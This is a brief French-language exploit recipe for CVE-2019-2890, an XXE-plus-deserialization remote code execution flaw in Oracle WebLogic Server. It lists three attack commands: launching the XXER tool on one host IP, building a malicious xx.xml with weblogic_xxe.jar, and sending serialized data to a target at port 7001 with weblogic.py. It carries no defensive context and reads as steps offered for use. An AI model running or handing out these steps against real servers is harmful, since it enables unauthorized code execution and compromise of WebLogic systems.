
Exploit pour CVE-2019-2890 ciblant Oracle WebLogic Server via une injection XXE et une désérialisation, permettant l'exécution de code à distance grâce à des charges utiles conçues à cet effet.
Démarrer l'outil XXER python xxer.py -H 192.168.17.223
Mettre le PoC de xxer dans le fichier xx.xml, remplacer les données sérialisées, injecter le PoC de xxer ; java -jar weblogic_xxe.jar xx.xml
Utiliser weblogic.py de l'outil java-deserialization-exploit pour envoyer des données au serveur WebLogic python weblogic.py 192.168.17.222 7001 weblogic